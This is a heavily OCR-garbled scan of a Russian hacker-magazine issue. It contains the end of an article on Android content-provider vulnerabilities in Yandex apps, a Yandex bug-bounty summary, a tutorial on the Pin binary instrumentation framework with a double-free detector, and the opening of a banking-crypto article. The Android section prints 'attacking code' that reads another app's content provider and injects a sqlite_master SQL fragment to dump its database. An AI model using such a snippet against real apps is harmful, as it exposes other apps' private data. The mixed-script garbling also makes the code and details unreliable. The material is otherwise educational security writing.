ІІЧТЕСЕР РКІМАКѴ 
КЕУ,беѵісе_іб Л"ЕХТ 

ШІЩШ ) 

іпбех 5д1іФе_аиФоіпбех б еѵісе іб 5 пиіі 

_беѵісе_іб_1 

И видим, что структура таблицы схожа с той, что была в Яндекс. Почте. В остальных про- 
граммах отличалось только имя контент-провайдера. 

«АТАКУЮЩИЙ» КОД 

Для того чтобы произвести атаку такого рода, не надо никакой дополнительной магии или 
прав на уровне системы. Достаточно в своем приложении вставить следующие строки и ра- 
зобрать ответ: 

5Фгіп|» Фаг^еФ = "сопіепі: : // ги .уапбех. беѵісе .іб . паѵі/аи~Ыіогі1:у " : 



СрпФепФРеБоІуег г = ^еФ СопФе п ФКе з оІѵегО : 



рГозесФіопАггау [0] = "* ГРОМ здііф ета зф ег- - " ; 



Сиг5ог с = г.диег ѵ(1 1гі. раг5е(ФагееФ) , рго]'есФіопАггау л пиіі., пиіі. пи11)х 

где іагдеі — контент-провайдер, а ргоіесйопАггау — дополнительные параметры в запросе. 
Если мы отправим пустую строку, то получим просто всю информацию из таблицы, а если 
добавим к запросу ”* РВОМ здіііе тазіег— " — ■ всю структуру 80 І_ііе БД. Таким образом наше 
приложение сможет получить или изменить данные другого. Исходники небольшой про- 
граммы, которая выводит структуру БД в виде всплывающего окна для некоторых уязвимо- 
стей из описанных выше, выложены на ОіІНиЬ ( ЬІТІѵ/12гѵ7з2 Ѵ 

ЗАКЛЮЧЕНИЕ 

В заключение хочу пожелать удачи как исследователям в поиске уязвимостей в чужих про- 
граммах, так и разработчикам — надеюсь, моя статья поможет им проанализировать свои 
приложения и быстро устранить все найденные баги. На сегодня это все, но я не проща- 
юсь — жди публикации о новых ошибках, а также о работе с другими типами уязвимостей, 
благодаря которым и ты сможешь попасть в различные залы славы. Удачи! ПС 



ОС Апбгоіб использует нумерацию каждой 
установленной программы, поэтому на конце 
может быть как -1 , так и -2. 

3. Далее можем реверсить методами, описан- 
ными в прошлых номерах, или устанавливать 
в эмул. 




АГРУЗКА С ПОМОЩЬЮ 



Энтузиасты отреверсили и составили АР1 
для работы с Ооодіе РІау (ранее Апбгоіб Магкеі). 
Скрипт написан на РуФоп и выложен на (ЗііНиЬ 
( аФІіиЬ.сот/еаігаиІІ/аооаІерІаѵ-арі ). есть также 
аналог на баѵа. Для его работы тебе понадо- 
бится АпбгоібЮ реального устройства, которое 
прикреплено к тебе или какому-то другому поль- 
зователю, а также логин и пароль или АиФТокеп. 
АпбгоібЮ можно узнать, набрав на 11880- 
команду ##8255##, где параметр аіб и будет 
твоим АпбгоібЮ. Все это вводим в файле сопіід. 
ру. Далее, например, можно найти все Яндекс- 
программы на маркете командой: 

зеа гсЬ.ру уапбех 



КЛАССИФМАЦИЯ 
УЯЗВИМОСТИ ПО 0ѴУА8Р 
МОВИЕ ТОР-10 
В РАМКАХ КОНКУРСА 
«ОХОТА ЗА ОШИБКАМИ» 



За М01 (небезопасное хранилище данных) — 
М05 (недостатки в механизмах аутентификации 
и авторизации в критичных приложениях) на- 
значают награду в 10 000 рублей, а для прочих — 
5000 рублей. За М06 (недостатки в управлении 
сессией) — М08 (утечка данных в критичных 
приложениях) — 5000 рублей, прочих — 3000 
рублей. В особых случаях размер награды может 
быть увеличен. 

Для отправки информации о уязвимости ис- 
пользуется веб-форма ИПр5://сотрапу.уапбех. 
ги/зесигііу/герогі.хті или ты можешь просто 
отправить письмом на почту зесигі1:у-герог1@ 
ѵапбех-іеат.ги . 







ее 



Взлом 





ИНСТРУМЕНТАЦИЯ — 












СИСТЕМА РІЫ НА ВООРУЖЕНИИ 



- г 

У “Л ' 








На протяжении нескольких статей мы 
погружались в мир инструментации 
кода, сравнивали статическую и ди- 
намическую инструментацию, рас- 
сматривали различные фреймворки. 
Сегодня же настало время вплотную 
познакомиться с фреймворком Ріп, 
используемым для динамической 
бинарной инструментации, разобрать- 
ся, как писать свои ріпІюоГы (модули 
для данного фреймворка) и где это 
может нам пригодиться при решении 
задач информационной безопасности. 



щ 

Дмитрий «01 ді» Е вдокимов, 
Оідііаі Зесигііу 




ЧАСТЬ 3 




РШВИБ 

О популярности фреймворка Ріп в мире информацион- 
ной безопасности свидетельствует его активное исполь- 
зование такими крутыми исследовательскими центрами, 
как іттипііу, Іупатісз, ПарісІУ, ЗоигсеКге ѴПТ, СОЗЕІІЧС 
и так далее. Неудивительно, что знание ОВІ уже сейчас 
встречается как одно из ключевых требований к специ- 
алистам по оценке безопасности ПО и разработке экс- 
плойтов, например на должность разработчика эксплойтов 
в Меіазріоіі. 

Помимо этого, ОВІ-фреймворки все чаще используют- 
ся для решения задач на различных СРТ-соревнованиях. 
Достаточно лишь взглянуть на решения заданий с рІаісІСТР 
2013 от команды ЕіпеіЬагеп ( Ьіі.іу / ІЯакшгу ) и с МОН2к13 
от @Зопа1:бапЗа!ѵѵап ( ЬіТ.І ѵ/ 1 8иР іх1 ) , чтобы убедиться, 
что без привлечения фреймворка Ріп на них ушло бы про- 
сто катастрофическое количество времени. Как видишь, 
все указывает на то, что с течением времени фреймворк 
Ріп будет только активней использоваться для решения 
различных задач в области информационной безопасно- 
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<>7 



Инструментация 



ЭВО ) 



1 ЮІ 



I I Л |Г“Т 

1 ИИ 



я пси 



ПІА 



ас 



*т 



Іп асШіоп Іо (Не гечиігетепіб, ѵѵе ргеТег сапсіісіаіег ѵѵію Иаѵе ехрегіепсе: 

• Оеѵѳіоріпд ѳхріоііе иеіпд іііѳ Мѳіазріоіі Ргатѳѵѵогк 

• Реѵегзе епдіпѳегіпд сотрііесі арріісаііопз 

• ЗМТ/ЗАТ зоіѵегз 

• Ѵагіоиз гип-ііте апаіуэіз Іѳсііпідиез 

(• Рупатіс Віпагу 1 паІгигпѳгіМі оп/ТгапзІаІі оп ^ 

• Рин-іезііпд 

• Ргодгаттіпд іп оИіег азэетЫу Іапдиаде5, зисіі аг АРМ, РРС, ЗРАРС, МІРЗ 

• ЕтЬесісіесі сіеѵіое гезеагсіі зпсі ехріоііаііоп 

АН іпіегезіер рагііез зИоиІР етаіі Шеіг гезитез *о рЬз[аЦте1азрІоіксот. 




Исполняемый 
модуль 



Инструкция 



Функция 



Базовый блок 



Программа 



сти. Поэтому, чтобы не отстать от передовых технологий, мы 
с ним сегодня и познакомимся. Начнем, как обычно, с теории 
и азов, а затем уже перейдем к практике. 

УРОВНИ ГРАНУЛЯРНОСТИ В РШ 

Так как основная идея инструментации заключается во встав- 
ке собственного кода в чужой, то очень важно определиться, 
куда именно мы хотим вставить наш код. От этого зависит 
как уровень контроля над программой, так и скорость работы 
программы под инструментацией. Чем больше контроль, тем 
меньше скорость, и наоборот. В Ріп назначаемые пользова- 
телем обработчики могут работать с анализируемым кодом 
на следующих уровнях функциональности и гранулярности: 

• Инструкции (ІЫ5). Обработчик, который вызывается 
для каждой инструкции исследуемой программы, регистри- 
руется при помощи функции ІМ5_АбШп5*гитепІРипс1:іоп(). 
Назначать обработчики для отдельных инструкций можно 
с помощью 1 N 5_І пзе гіС аі I ( ) . Для анализа инструкций Ріп 
использует библиотеку под названием ХЕБ. Ее АРІ также 
доступен для использования в инструментальных модулях. 

• Базовые блоки (ТРАСЕ). Под базовым блоком подраз- 
умевается линейный участок кода, находящийся между 
двумя инструкциями, которые или являются точкой входа 
вектора исполнения, или непосредственно меняют значе- 
ние ЕІР (САГЕ, ЛѴІРДІхх, ПЕТ и так далее). Как видишь, в Ріп 
понятие ББ отличается от классического определения. Об- 
работчик, который вызывается для каждого базового бло- 
ка исследуемой программы, регистрируется при помощи 
функции ТНАСЕ_АббІп5ІгитепІРипс1юп(). Назначать обра- 
ботчики для отдельных базовых блоков можно с помощью 
ВВІ_ 1пзег1Са11(). Для работы с отдельными инструкциями, 
составляющими базовый блок, в теле обработчика можно 
использовать функции ВВІ__1п5НеасІ0/ВВІ__Іп5Мех10- 

• Функции (РТІМ). Обработчик, который вызывается для каж- 
дой функции исследуемой программы, регистрируется 



Требования в вакансии 
для работы в команде 
Меіавріоіі 



Уровни гранулярности 
в Ріп 




ІѴАВДШС! 

На момент написания 
статьи Ріп еще не под- 
держивал ѴізиаІ ЗШШо 
2012. Поэтому для 
разработки собствен- 
ных Ріп -инструментов 
используй более ранние 
версии ѴізиаІ Зіисііо. 



при помощи функции НТМ_АсІсІІпз{гитепіСаІ[(}. Для работы 
с инструкциями исследуемой функции внутри этого обра- 
ботчика следует использовать ПТЫ_Іп5НеасІ(}/РТМ_Іп5ТаіІ0, 
а также семейство [ІМЗ-функций для исследования самих 
инструкций. Стоит сказать, что ПТМ АбСІІпзІгитепІСаІІО 
работает корректно только при наличии отладочных сим- 
волов, в противном случае стоит использовать обработку 
инструкции саіі. 

• Исполняемые модули (ІМС). Обработчик, который вы- 
зывается при загрузке какого-либо исполняемого модуля 
в контекст исследуемого процесса, регистрируется при по- 
мощи функции ІМС АбсІІпзІгиппепІРипеІіоп(). Для работы 
с загружаемым модулем из обработчика используются 
другие ІМС-функции, а для работы с отдельными секция- 
ми — функции 8ЕС-семейства. 

РЖ АРІ 

Если говорить про АРІ Ріп, то он достаточно большой, поэтому 
полностью его рассматривать нецелесообразно и скучно. Так 
что мы просто бегло пробежимся по основным его классам, 
чтобы ты мог впоследствии в нем ориентироваться. Но перед 
тем как мы пойдем дальше, необходимо сделать одно неболь- 
шое замечание. 

Так как ядро Ріп перехватывает исполнение целевого про- 
цесса начиная с точки входа системного загрузчика, в инстру- 
ментальных модулях гарантировано безопасное использова- 
ние только функций самого Ріп и стандартной библиотеки С/ 
С++. Попытка использования, к примеру, ѴѴіп32 АРІ чаще всего 
приводит к неработоспособности инструментального модуля. 
Это необходимо помнить при написании собственных инстру- 
ментов. 

Ну а теперь вернемся опять к АРІ. Итак, Ріп предоставля- 
ет следующие АРІ, которые не связаны с уровнями грануляр- 
ности инструментирования программы, а предназначены 
для вспомогательных задач: 




Запуск приложения под Ріп: 

ріп.ехе [ріп орііопа] -1: ріггЕо о! п ате . гііі [ ріігЕоо! орііо пз] -- а р р пате.ехе 
Приаттачить Ріп к уже запущенному приложению: 

ріп.ехе [р іп орііопа] -1: р іпіооі пате.сііі [ р ігѵЕоо! орігіопз ] -рісі <#ріс!> 



х86 64 Ьіі 

32 Ьіі 



ѴѴіпсіоѵѵз + + 

І_іпих + + 

05 X + + 

Апсігоісі + — 



где ріпорііопе — параметры работы самого Ріп, ріпіооІпате.сІІІ — инструментальный 
модуль, ріпіооІ_орІіоп8 — параметры инструментального модуля, аррпате.ехе — инстру- 
ментируемое приложение. 



Поддерживаемые ОС и архитектуры 
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* Инициализация и контроль программы {СОИТВОЦ. Данная 
группа функций используется для инициализации Ріп, за- 
пуска приложения и установки обратных вызовов для вы- 
хода из приложения и подобных событий. 

* Работа с символами исполняемого модуля ($ѴМ). Обеспе- 
чивает информацией об используемых отладочных сим- 
волах в исполняемом приложении. Для этого сначала не- 
обходимо вызвать РІкНпКЗутЬоІзО, чтобы символы стали 
доступны. Доступ к символам можно получить как во время 
инструментации, так и во время анализа. 

* Регистры (ВЕС). Данная группа функций используется Ріп 
для работы с регистрами как во время инструментирова- 
ния, так и во время анализа. 

* Аргументы для процедур инструментирования (АВС). Опи- 
сывает аргументы для процедур, которые непосредственно 
производят инструментацию программы. Может описывать 
порядок выполнения процедуры (до выполнения кода, по- 
сле выполнения кода, до и после), порядок выполнения об- 
работчиков для одной и той же инструкции (если их назна- 
чено несколько на нее одну) или просто типы передаваемых 
параметров (ІАВС_АООВІМТ, ІАВС_РТВ, ІАВС_ВООІ_, ІАВС_ 
1ЛЫТ32, ІАРЮ_ІЫ5Т_РТРІ, ІАВС_ВЕѲ_ѴАШЕ и так далее). 

* Быстрая буферизация (ВІІРРЕВ). Эта группа функций 
предназначена для работы с данными, которые хранят- 
ся в буфере Ріп. Функция РЦЧОеІіпеТгасеВиТСегО ис- 
пользуется для создания места для хранения данных, 
ІІЧЗ_Іпзеі1РШВиТСег{) используется для заполнения данного 
буфера. Это может быть полезно для оптимизации работы 
инструмента и при работе с самомодифицирующимся ко- 
дом. 

* Прототип: описание процедур приложения (РВОТО). Пред- 
назначена для описания прототипа процедур приложения, 
которое подвергается инструментированию, что позволя- 
ет значительно улучшить анализ процедур. В прототипе 
описывается соглашение о передаче параметров в функ- 
цию, тип и размер каждого аргумента функции. Это может 
быть очень полезным при описании функций с перемен- 
ным количеством параметров (типа зсап^). 

* Потоки (ТНВЕАР). Данная группа функций предназначена 
для работы с потоками и между потоками. Данные АРІ до- 
ступны в каждом потоке, включая любой внутренний поток, 
порожденный инструментом. 

■ Процессы (РВОСЕ53). Предоставляет информацию об ин- 
струментируемом процессе. Также доступны в любом по- 
токе, включая любой внутренний поток, порожденный ин- 
струментом. 

Список АРІ довольно внушительный, но теперь, надеюсь, 
ты уже хоть немного представляешь, к какой группе функций 
стоит обратиться при реализации того или иного функционала. 

РІЫ ДЛЯ ФАЗЗИНГА 

На самом деле Ріп можно использовать абсолютно на всех ста- 
диях процесса фаззинга: от подготовки тест-кейсов до ловли 
крешей. 

В подготовительной стадии Ріп отлично подходит для ана- 
лиза собе соѵегаде с целью выбора наименьшего количества 
тест-кейсов, обеспечивающих наибольшее покрытие иссле- 
дуемого кода. При этом мы легко можем играться с уровнем 
точности (гранулярности) — от инструкции до исполняемого 
модуля. Чаще всего используется уровень базовых блоков. 

Далее в процессе фаззинга (если он мутационный) Ріп 
можно использовать для реализации іп теітюгу фаззера. Это 
не особо сложно, так как мы полностью контролируем как по- 
ток данных, так и поток управления программы. 

И наконец, в заключительной стадии мы можем как про- 
сто ловить падения программы при возникновении Ассезз 
Ѵіоіайоп, так и на основании определенных сигнатур опре- 
делять баги до их фактического проявления. Например, 
для идентификации переполнения буфера в стеке можно пе- 
ред выполнением инструкции ВЕТЫ проверять корректность 
хранимого адреса на стеке. Или еще пример: вести собствен- 
ный счетчик ссылок на объект, и если объект удален, а ссыл- 
ки на него еще остались, то значит, мы, скорее всего, нашли 
изе-аПеМгее багу. При более детальном анализе возникнове- 
ния ошибки Ріп совместно сХЕЭ можно использовать для Іаіпі: 





Арріісзіюп іпгааіііэйоп 
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ргорадаііоп, что позволит определить, какие именно входные 
данные привели к падению. 

Приведу еще несколько проектов, которые обязательно 
пригодятся при фаззинге: 

1. Сосіе-соѵегаде-апаіузіз-'іооіз ( ЬіІІѵ/бУЕІсК ) — анализатор 
покрытия кода. 

2. НипТгасег (айбиЬ.сот/агиаа/ВипТгасег ) — набор инстру- 
ментов для отслеживания потока управления программы. 

3. РіпЗіаік ( лІ.Іу/ІбРТгзх) — еще один инструмент для анали- 
за покрытия кода (да, их действительно много). 

4. Ріпіод (собе.доодІе.сот/р/кѳгскбо1 : Тз) — крутой трейсер 
с поддержкой Мтсіом/з/Ыпих/Мас и х32/х64-архитектур. 

РМ ДЛЯ НЕ 

Область применения ОВІ-фреймворков просто огромна, и ос- 
новная их задача - это восполнить недостатки статического 
анализа. Все, что неизвестно / не определено при статиче- 
ском анализе (относительные переходы, виртуальные вызовы, 
содержимое памяти, динамически генерируемый код), можно 
легко и просто узнать в процессе выполнения. Также есть еще 
одно интересное направление, связанное с восстановлени- 
ем исходной структуры данных. Задача состоит в том, чтобы 
по операциям, выполняющимся над данными, определить 
их тип (роіпіег, іпіедег, сбаг, зігисі и так далее) и размер. 

Вот небольшой перечень инструментов, которые ты мо- 
жешь взять за основу для написания собственных (чтобы за- 
ново не изобретать велосипед): 

1. КегскбоТСз (собе.доодіе.сот/р/кегскбоіі'з) — инструмент 
для полуавтоматического детектирования криптографиче- 
ских примитивов в программах. 

2. ХгеМіпбег (Ьі!.Іу/'1акоІСѵ ) — набор инструментов 

(ЮАРуібоп плагин и ріпіооі) для восстановления пере- 
крестных ссылок, которые неизвестны до выполнения 
(типа саІІ еах), в файле баз данных ЮА Рго. 

3. ЭіІіСоѵ ( 0І1Д//ІІ ЗйУѵ 'Рз) — набор инструментов для записи 
выполнившихся базовых блоков программы. 

4. Нипііте-Ігасег (аіібиЬ.сот/пеигоо/гипбте-ігасег ) — соз- 
дает трейс выполнения программы со значениями реги- 
стров и обрабатываемыми участками памяти. 

Также стоит отметить, что с версии 6.4 ЮА Рго имеет соб- 
ственный встроенный модуль-трейсер, базирующийся на Ріп. 

РШ ДЛЯ АНАЛИЗА МАШАЯЕ 

Когда говорится про использование ЭВІ для исследования 
таіѵѵаге, то обычно подразумевается две области: автомати- 
зация распаковки и детектирование шелл-кода. На сегодняш- 
ний день для того и другого уже есть готовые ріпіооі. Напри- 
мер: 

1. ѴЕВА ( сзг.іапі.доѵ/ѵега ) — инструмент для визуализации 
работы программы. Очень наглядно можно видеть, где ра- 
ботает распаковщик, а где основная часть таІ\л/аге. 

2. Тгіроих (собе.доодіе.сот/р/ігіроих ) — анализатор упаков- 
щиков зловредов. 

3. ТгасеЗигіег ( собе.аооаіе.сот/р/іагіеіаііпіюоіз ) — набор 
инструментов для анализа вредоносного кода. 

4. Ѳобѵѵаге ( аіібцЬ.сот/іЬгетег/аобѵуаге ) — совсем неболь- 
шой помощник для анализа вредоносного кода. 

А вот при анализе эксплойтов (которые часто используют- 
ся во вредоносном ПО), а точнее, шелл-кодов могут приго- 
диться следующие два инструмента: 
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Инструментация — эволюция анализа 






1 . ЗГіеІІсосІе сіитрег { ж.Іѵ ' : іх?. ) — дампѳр стандартных шелл-кодов, 
принцип работы которых основывается на передаче управления на зіаск 
или беар. 

2. Мойоѵѵ-тііідаііопз ( )іІ.Іѵ/17х9Аігг ) — прототип, идентифицирующий ВОР- 
ш ел л -коды и ЛТ- шелл -коды. 

Для более глубокого понимания автоматизации деобфускации и рас- 
паковки советую изучить презентацию Рупатіс Віпагу Іпзігитепіайоп Іог 
ОеоМизсайоп апсі ІІпраскіпд ( Щу/13А50 ). Также полезно будет ознако- 

миться с презентацией парней из МісгозоИ под названием ЗйеІІсосІе апаіузіз 
изіпд сіупатіс Ьіпагу іпзІгитепШйоп ( іі.І ѵ/Шѵ ; ). Они также разработали 
детектор шелл- кода на базе Ріп под названием 5НАІМ {Ібе ЗНеІІсогіе АЫаІугег), 
но, к сожалению, в открытый доступ его не выложили. Зато как он работает, 
описали подробно, так что нет проблем его реализовать собственными уси- 
лиями. Их детище способно ловить как классические шелл-коды, так и ПОР. 

РІ ЫНА ПРАКТИКЕ 

О структуре и способах применения поговорили. Теперь настало время рас- 
смотреть на практике, как работать с этим чудесным фреймворком. 

Установка и настройка 

Прежде всего идем и скачиваем с официального сайта ( тІеІ.Іу/НЫтНІіУ ) 
фреймворк Ріп (или берем с нашего диска). Я использую ѴізиаІ Зіисііо 2010, 
поэтому скачал архив по ссылке ѵсЮ. Следующим шагом надо будет рас- 
паковать его в любое удобное тебе место. Я, например, распаковал его 
в 0:\ріп-2.12-58423-тзѵс10-ѵйпсІо\л/з. Собственно, на этом вся установка за- 
вершена, можно переходить к использованию. 

Нас будет интересовать поддиректория \зоигсе\1оо1з\, в которой находят- 
ся уже реализованные инструменты. Пробежавшись по папкам, ты увидишь 
кучу исходников и такеШе’ов для их сборки. Но надо сказать разработчикам 
спасибо: они предоставили также проект-шаблон для студии, на основании 
которого можно очень просто создать свой собственный модуль, не колдуя 
с такеіііе’ами и не заморачиваясь с путями и параметрами компиляции. 
Находится он в папке МуРіпТооІ. Его-то мы и возьмем за основу. Создаем 
в \зоигсе\1оо1з\ копию папки МуРіпТооІ с названием своего будущего ин- 
струмента, например ОоиЫеРгее. 

Задача и алгоритм 

Теперь о самой задаче, которую мы будем реализовывать. Сегодня нашей 
целью будет отлов багов в программах, когда освобождается уже осво- 
божденная память, то есть когда происходит второй вызов функции Тгее{ ) 
для уже освобожденной памяти. 

Каким образом мы будем отлавливать такие баги? Все достаточно про- 
сто: в приложении и динамических библиотеках будем искать функцию 
та!Іос() и устанавливать обработчик, который бы срабатывал после ее вы- 
зова и сохранял возвращаемое ею значение в массив. Аналогично и с функ- 
цией 1гее(), также надо установить обработчик, который будет проверять 
наличие указателя на освобождаемый участок памяти в нашем массиве. 
В случае если он там присутствует, просто удаляем его, а если отсутству- 
ет — значит, мы его уже удалили и пытаемся сделать это повторно, то есть 
вот она, боиЫе Ітее бага. 

Кодинг 

Итак, с алгоритмом разобрались, открываем скопированный проект и идем 
писать исходный код (тот, что остался после копирования, можно просто 
удалить). Прежде всего подключаем заголовочные файлы: ріп.Н, іозігеат, 
іотапір, аідопіііт, Іізі, зігіпд.б, зМіо.М. После чего задаем глобальную пе- 
ременную, в которой будут храниться все выделенные функцией та11ос{) 
адреса: 

// Список выделенных адресов 

Из1:<А00К1М> МаІІосАсІгігз^ 

Теперь пишем функцию, которая будет вызываться после таІІос() и сохра- 
нять 8 МаІІосАбсігз адреса выделенных ею участков памяти. 

// Функция, которая вызывается каждый раз после вызова 

// функции таІІосО 

ѴОП) Ма11осАТ1:ег(А00КІМТ ге - ^ АООКШГ .іпзі:) { 

// Сохраняем адрес, возвращенный таІІосО в наш список 

ІТ ( ге~Е ! = 0) { 

П зТкАРРКІІУІТ»: : іТе га1:ог р; 

р =^йпсІ(Ма11осАс(сІГ5.Ьеёіп() і МаІІосАсІсІгз . епо(( ) , ге!) ; 

ІТ (МаІІосАсІсІгз .епсІО == р) { 

МаІІосАсІсІгз .ризЬ_Ьаск(ге'Ь) ; 

> 



Одной из важных (не независимых) частей Ріп является библиотека 
ХЕР (акроним отХ86 Епсосіег йесосіег). Она позволяет кодировать 
и декодировать х86 (ІА-32 и Іпіеі® 64) инструкции. Декодер на вход 
получает последовательность байтов (машинный код) и возвращает 
структуру, описывающую опкод, операнды и флаги. Кодер произ- 
водит обратную операцию. На текущий момент ХЕО поддерживает 
І_іпих, ѴѴіпсІоѵѵз, 05 X, РгееВЗО и умеет читать бинарные образы фор- 
матов РЕ/СОРР, Е1_Р и МАСНО для 32Ь и 64Ь. Для вывода инструкций 
поддерживается три формата: ІпіеІ, АТТ 5ѴЗѴ и внутренний (очень 
детализированный). 




І-Р ( I N5 0рСОгіе(ІП5 ) == ХЕР ІС І.А 55 М 0Ѵ && 



ІМ5_І5МетргуКеас1(іп5) && 



ІИ5 ОоегапгіІзРег(іпз. ) && 




Чем это может быть полезно в задачах И Б? Тут от банального 
написания анализатора зІіеЕІсосГов до написания инструмента, 
реализующего Шіп* р го рад ай о п (отслеживание распространения/ 
влияния каких-либо данных в программе). 

В последнем варианте мы можем получить хорошую деталь- 
ную информацию о каждой инструкции в процессе программы и 
сказать, как они влияют на флаги и как внутри них операнды влияют 
друг на друга, то есть можем следить за процессом іаіпг. 



АЛП-РЖ 

Апй-СеЬид и апй-ѴМ техниками в наше время уже никого не уди- 
вишь, а вот противодействовать активно набирающим популярность 
ОВІ-фреймворкам надо начинать. Так, парни из Соге Зесигііу на кон- 
ференции НЕСоп 2012 представили исследование Оупатіс Віпагу 
Іпзігитепіайоп Ргатеѵѵогкз: I кпоѵѵуои’ге йіепе зруіпд оп те. В дан- 
ной работе они рассмотрели техники антиинструментации, направ- 
ленные на фреймворк Ріп. Провернуть им это удалось достаточно 
просто: все в основном заключается в обнаружении ріпѵт.сІІІ (ее 
свойств и характеристик), обнаружении работы Л Т- компилятора, 
проверки НапСІег’ов, временных задержек и так далее. В результа- 
те они написали программку еХай (еХІепзіЫе Апй-Іпзй'итепіайоп 
Тезіег), которая позволяет детектить инструментацию. Правды ради 
стоит сказать, что Ріп абсолютно никак себя не скрывает. В общем, 
еще есть огромная область антианти инструментации :). 



РЖ ДЛЯ АШОЮ 

Совсем недавно компания Іпіеі выпустила версию Ріп для ОС 
АисІгоісІ, Для запуска Ріп на АпбгоіеІ-девайсе понадобится: хостовая 
Ыпих-машина, гооі-доступ на устройстве и установленный ВизуВох. 
Также надо будет скачать АпсІгой ЗОК и АпйгоісІ МОК. После этого 
компилируем ріпйэоі на хостовой машине с указанием целевой ОС 
(ТАРКЗЕТ 05=апсігоісІ), заливаем его на устройство и запускаем как 
обычно. 
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РІМ ор^іоггг 

РШ Віпагу раі:Ь 
РІ(\І ТооЬ ра^Н 
Тгасе КшіЬ 5іге 

0п 5^:аг1ир епаЫе 

О Іпйгусиоп Сгасіпд 
I 8а5іе ВІоск Іггасіпд 
0 Рипйіоп кгасіпд 
О Реді5і;ег ѵаіиее гесогсііпд 



РШ ТооІ 

У і АиЫаипсЬ РШ Рог ІосаіРюзР 
□ ОеЬид пю^е 



Ехіга агдитепРэ: 
ВеРоге РШ РооІ 

АРЬег РІЫ ЬоІ 



ОК 




— 

СапееІ 



еіае 

і 

Ю6( " Маі іос асісігеББ аігеасі у *-■ 

аа ѵесі? 1 \п ") : 

сегг << "аігеасіу заѵесГ << Ьех << +-> 
іпзі: << епсііі 

} 

1 

еІ5е 

і 

ЮбХ" Маііос -Р аіІХп "); 

} 

1 




штѵ 

ѴѴогкзіюр «Віпагу 
Іпзігитепіаііоп Іог 
зесигііу рго^еззіопаіз: 

Шр://ЬіМ ѵ/дР ѵѵіКд 



// Инициализация библиотеки Ріп 

ІТ ('РІІМІпіІіСаг^с , аг§ѵ)) 

і 

геТигп 11за§е( ) ; 

.} 

// Регистрируем функцию, которая вызывается 

// для инструментации модулей 

ІМС_АсісІІп5'ЬгитепѣРипс1:іоп ( Іта|^ 



// Запуск 

Р ІМ _5 ІагіРго^ га т ( ) ; 



' :■: 1.1 -г п 0 : 



Теперь очередь за функцией, которая перед вызовом 1гее() } 

будет проверять, не была ли уже освобождена память. 



// Функция, которая вызывается каждый раз перед 
// вызовом функции ТгееО 

ѴОІР РгееВе-Роге(АРРКІІЧТ Та гее*. АРРіШІТ іпаТ) 

і 

1і 5-Е<АРРКШТ>: :И=е га Тог р; 

р = бпсі(Ма11осАсісіГ5 .Ье§іп() ^ МаІІосАсісіга 

епФ(), Татк еТ); 

ІТ ( ( 1 (МаІІосАсісІГБ . етрТу ( ) ) ) && 

(Ма11осАсІсІГ5 . епсІ() 1= р) ) 

- 1 - 

// Удаляем адрес из нашего списка 

р = МаІІосАсісІГБ .егазе(|)Х; 

> 



{ 

// Происходит вызов ТгееО адреса, который 

// не выделен -> РоиЫе Тгее уязвимость! 

сегг << Иех << ■Ьагёеѣ << " " << іпз'І: << «-■ 
епсІІ^ 

1 

1 

Осталась еще одна функция, которая будет применяться 
для инструментации модулей и устанавливать наши обработчи- 
ки на функции ?гее() и таІІосО, ■ - Ітадѳ(ІМС ітд, ѴОЮ *ѵ). Из-за 
экономии места здесь мы ее код приводить не будем, ознако- 
миться с ней ты можешь в полном исходнике, который найдешь 
на нашем диске. 

Ну и наконец, собираем все воедино в функции тагп(): 
іп^: таіп (іп1: аг^с , сИаг *аг^ѵ[] ) 

I 



// Инициализация обработки символов 

РІМ_Іпі1:5утЬоІ5(); 



Осталось сохранить все изменения, нажать <Р7>, чтобы 
сбилдить проект, и ты получишь свой первый инструментиру- 
ющий модуль для фреймворка Ріп, модуль этот будет искать 
сіоиЫе Тгее уязвимости. Ну а как инструментировать приложе- 
ния с помощью своего модуля, я уже показывал выше. 

Отладка 

В завершение хотелось бы немного коснуться вопроса отладки 
своего ріп_ІооІ. Дело в том, что для своей работы Ріл использует 
отладочные АРІ, поэтому просто запустить свой модуль из-под 
отладчика не получится. Вместо этого надо запустить ріп из ко- 
мандной строки и передать ему опцию -раизе_1ооі п, которая 
заставит его вывести РЮ процесса и остановиться на п секунд. 
За это время к нему можно будет приаттачиться отладчиком 
Ѵізиаі Віисііо. 

% ріп < ріп о р~1 іоп5 > - раіі5е _ 1;оо1 20 -1 сЕ оо! паше> 
<1оо1 ор1іоп5> -- <арр пате> <арр ор±іоп5> 



ріп БизрепсіесІ ргосезБ [ісі=<рісІ>] маі^іп§ -Рог 
сіеЬи§§ег а^'ЬасІі. Ргѳбб <Еп"1;ег> ыііел геасіу 
ѣо сопіііпие . . . 



Это может быть немного неудобно, но все же лучше, чем 
сидеть совсем без отладки или отлаживать с помощью лог- 
файлов. 

ЗАКЛЮЧЕНИЕ 

Ну вот и подошла к концу серия статей про инструментацию 
кода. Теперь ты знаешь, что такое инструментация, с чем ее 
едят, какие фреймворки можно для нее использовать. И даже 
представляешь, как написать собственный модуль для Ріп. 
Дальше дело только за тобой. Овладев хотя бы одним из рас- 
смотренных фреймворков, ты сможешь поднять свои знания 
на еще один уровень вверх и стать очень востребованным спе- 
циалистом :). НС 




РШ И РѴТНСШ 



Реверс-инжиниринг 
без РуФоп сегодня уже 
нельзя представить. 
Везде нужна автоматиза- 
ция и мощь скриптовых 
языков программирова- 
ния. В результате всего 
этого появились два бин- 
динга на Руііюп для Ріп: 
РіпРу (Ьі1.Іу/Р0№Т ) 
и РгосеззТар ( зіі.Іу/ 
Оу^е). Таким образом, 
в одном проекте можно 
легко использовать 
мощь ЮАРуШоп, ѵТгасе, 
23Ру и РгосеззТар/РіпРу. 









РУКОВОДСТВО ПО ЛЕЧЕНИЮ СЕРТИФИЦИРОВАННОЙ 
КРИПТОГРАФИИ В БАНКОВСКИХ ПРИЛОЖЕНИЯХ 



Почти каждый хакер или пенте- 
стер время от времени сталки- 
вается с нестандартными крип- 
тографическими протоколами, 
которые можно встретить в бан- 
ковской сфере, в технологических 
сетях предприятий и так далее. 

В этой статье мы расскажем о ме- 
тодике исследования и взлома 
таких систем на примере одного 
банковского приложения. Ты уви- 
дишь, как просто иногда обойти 
сложную криптографическую 
защиту из-за того, что разработ- 
чики не слишком хорошо знают 
современные протоколы уровня 
приложений. 




Андрей Петухов, 
ЗоІісНаЬ 

апгігещ.ре1икііоѵ@50ііс!ІаЬ.г[ ] 




Георгий Носеевич, 

МГУ имени М. В. Ломоносова 

шЬрепІезШЬизІжІіаскегз.т 




Денис Гамаюнов, 

МГУ имени М. В. Ломоносова 

аатаіип@зесІаЬ.сз,ітзу.зи 



